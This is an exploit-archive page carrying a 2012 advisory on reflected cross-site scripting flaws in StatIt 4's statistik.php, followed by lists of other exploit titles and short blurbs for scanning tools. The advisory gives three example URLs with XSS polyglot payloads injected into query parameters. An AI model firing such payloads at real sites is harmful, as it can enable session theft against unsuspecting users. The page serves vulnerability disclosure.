Menu

Search for hundreds of thousands of exploits

"StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities"

Author

Exploit author

sonyy

Platform

Exploit platform

php

Release date

Exploit published date

2012-01-04

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
source: https://www.securityfocus.com/bid/51280/info

StatIt is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

StatIt 4 is vulnerable; other versions may be affected. 

The following example URIs are available:

http://www.example.com/statit4/statistik.php?st_id=1&action=stat_last%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&enc=333263120212292&agent=ari/534.30&PHPSESSID=14d0f57363caf5ef2d7fb1b56238dace&PHPSESSID=14d0f57363caf5ef2d7fb1b56238dace

http://www.example.com/statit4/statistik.php?action=stat_tld&st_id=1&show=more%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E\&PHPSESSID=d8679fc904017bdf6b09f5d88f7cf979

http://www.example.com/statit4/statistik.php?action=stat_abfragen&st_id=1&show=more&order=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&sort=1&PHPSESSID=698bf9d1e988e3af70022f1dfb86fd33
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2012-04-20 "Pendulab ChatBlazer 8.5 - 'Username' Cross-Site Scripting" webapps php sonyy
2012-03-28 "Invision Power Board (IP.Board) 4.2.1 - 'searchText' Cross-Site Scripting" webapps php sonyy
2012-03-18 "JavaBB 0.99 - 'userId' Cross-Site Scripting" webapps java sonyy
2012-03-13 "Omnistar Live - Cross-Site Scripting / SQL Injection" webapps php sonyy
2012-02-27 "Bontq - 'user/' URI Cross-Site Scripting" webapps php sonyy
2012-02-18 "Tiki Wiki CMS Groupware - 'url' Open Redirection" webapps php sonyy
2012-02-17 "JaWiki - 'versionNo' Cross-Site Scripting" webapps java sonyy
2012-02-17 "ButorWiki 3.0 - 'service' Cross-Site Scripting" webapps php sonyy
2012-02-16 "Impulsio CMS - 'id' SQL Injection" webapps php sonyy
2012-02-13 "SMW+ 1.5.6 - 'target' HTML Injection" webapps php sonyy
2012-02-13 "Zimbra - 'view' Cross-Site Scripting" webapps php sonyy
2012-02-10 "ProWiki - 'id' Cross-Site Scripting" webapps php sonyy
2012-02-10 "RabbitWiki - 'title' Cross-Site Scripting" webapps php sonyy
2012-02-02 "GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities" webapps php sonyy
2012-01-26 "xClick Cart 1.0.x - 'shopping_url' Cross-Site Scripting" webapps php sonyy
2012-01-09 "Gregarius 0.6.1 - Multiple SQL Injections / Cross-Site Scripting" webapps php sonyy
2012-01-04 "StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php sonyy
2012-01-04 "UBBCentral UBB.Threads 7.5.6 - 'Username' Cross-Site Scripting" webapps php sonyy
2012-01-02 "FuseTalk Forums 3.2 - 'windowed' Cross-Site Scripting" webapps php sonyy
2011-09-08 "SkaDate - 'blogs.php' Cross-Site Scripting" webapps php sonyy
2003-01-13 "W-Agora 4.1.6 - 'modules.php?File' Traversal Arbitrary File Access" webapps php sonyy
2003-01-13 "W-Agora 4.1.6 - 'index.php?bn' Traversal Arbitrary File Access" webapps php sonyy
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.